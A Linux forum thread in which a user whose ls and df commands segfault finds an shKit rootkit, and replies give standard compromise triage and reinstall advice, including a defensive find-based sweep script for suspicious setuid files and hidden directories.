I keep on getting segmentation fault when running commands like ls, df etc...
I am not sure if I am hacked. Does anybody have any idea if this could be caused by somebody hacking me?
Sure, anything is possible if someone obtains root to your system, but it's not likely to be the problem. Sounds like you've got some corrupt/missing libs (maybe even a bad HD). I would first try strace'ing the process to hopefully figure out why it's segfaulting. Maybe it's something simple like an unmounted filesystem or something, but it's impossible to diagnose knowing of only 1 of the programs that segfaulted (and not even having any details on that one).
I am not sure if I am hacked. Does anybody have any idea if this could be caused by somebody hacking me?
Without details this is hard to assess. Some rootkits do fsck up. What you need to do is verify your box's integrity, that is users and processes. Verify running services *are* the services you usually run (netstat -anp), verify your system auth files /etc/{passwd,shadow,group} aren't changed, then verify your system login accounting (wtmp, utmp, acct), log files (check /etc/syslog.conf if unsure which log files). Tell-tale signs could be new setuid root files in locations like /tmp or /var/tmp, dirs whose names start with a dot or "...", system binaries owned by other users, insmod errors at boot time, weird loglines in application logs. Please report anomalies you find.
I keep on getting segmentation fault when running commands like ls, df etc...
Use whatever tools your distro's package manager provides to verify the contents of the packages against a known trusted source like CDs or an FTP mirror. If you've got another box, try compiling Chkrootkit, scp it over and run. Please report anomalies you find.
Sure, anything is possible if someone obtains root to your system, but it's not likely to be the problem.
IMHO you should refrain from saying "not likely" unless you have a thorough understanding of the situation at hand; system compromise is too grave an issue to be nonchalant about.
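The tell-tale signs listed in the post above can be swept for with plain find; what follows is an added example, not part of the original thread, and its function names, the socket-directory allowlist and the `scan` argument are illustrative assumptions. On a box where ls or ps already misbehave, run it with tools from trusted media, since the local find and ls may themselves have been replaced.

```shell
#!/bin/sh
# Added example: triage sweep for the signs named in the post above.
# Function names, the allowlist and the "scan" argument are illustrative.

# Setuid files under temp dirs; ls -ld shows the owner so root-owned ones stand out.
find_setuid() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -xdev -type f -perm -4000 -exec ls -ld {} + 2>/dev/null || :
    done
}

# Directories whose names start with a dot (this also matches "..." and ".. ").
# The X11/ICE socket dirs are assumed to be legitimate on a desktop system.
hidden_dirs() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -mindepth 1 -xdev -type d -name '.*' \
            ! -name '.X11-unix' ! -name '.ICE-unix' ! -name '.font-unix' \
            -print 2>/dev/null || :
    done
}

# Files in binary dirs whose owner is not the expected uid (0 for root).
foreign_owned() {
    uid=$1; shift
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -xdev -type f ! -uid "$uid" -exec ls -ld {} + 2>/dev/null || :
    done
}

# Run the whole sweep only when asked: sh triage.sh scan
if [ "${1:-}" = "scan" ]; then
    echo "== setuid files in temp dirs"
    find_setuid /tmp /var/tmp
    echo "== dot-named dirs in temp dirs"
    hidden_dirs /tmp /var/tmp
    echo "== system binaries not owned by root"
    foreign_owned 0 /bin /sbin /usr/bin /usr/sbin
    echo "== listening sockets and owning processes"
    netstat -anp 2>/dev/null | grep -i listen || :
fi
```

Anything it prints is a lead to compare against package-manager verification from trusted media, not a verdict by itself.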
As said, I found the code already mentioned in the previous posting. I also used chkrootkit and found shKit rootkit. I guess my only option is to fdisk and redo the machine.
I found a process xntps which loads at startup.
What would be the best software to monitor any unauthorised access to my server?
As said, I found the code already mentioned in the previous posting. I also used chkrootkit and found shKit rootkit. I guess my only option is to fdisk and redo the machine.
Yes, it is.
I found a process xntps which loads at startup.
Could be a rogue OpenSSH binary providing a backdoor.
What would be the best software to monitor any unauthorised access to my server?
Repartition, reformat, reinstall from scratch, run your filesystem integrity scanner, harden the box. Without this any filesystem integrity scanner (Aide, Samhain, tripwire, choice depends on how many hosts you need to check, how trustworthy you want the databases to be and how comfortable you are with configuration) will be useless. Same goes for intrusion detection systems like Snort, Prelude etc.
Well, if ps was replaced with that code then someone has obtained root access to your machine. Your best bet is to reinstall. If you want to monitor traffic going to that machine, though, I would suggest doing 1 of 2 things.
1) set up a firewall machine to log all traffic to your machine.
2) put a hub between your machine and whatever your machine is connected to, then put another machine on that hub and sniff the traffic.
I was having LOTS of problems with SegV faults on my Slackware system, up until about a month ago. Turns out, my system was overclocked just 20 MHz too much. Windows didn't seem to mind, but since Linux almost demands perfection, it had SegV faults. I've read that a few AMD processors contain a bug that can cause SegV faults. Also, if your RAM is running at a clock speed that is too slow, it can drop a bit or two, causing SegV faults.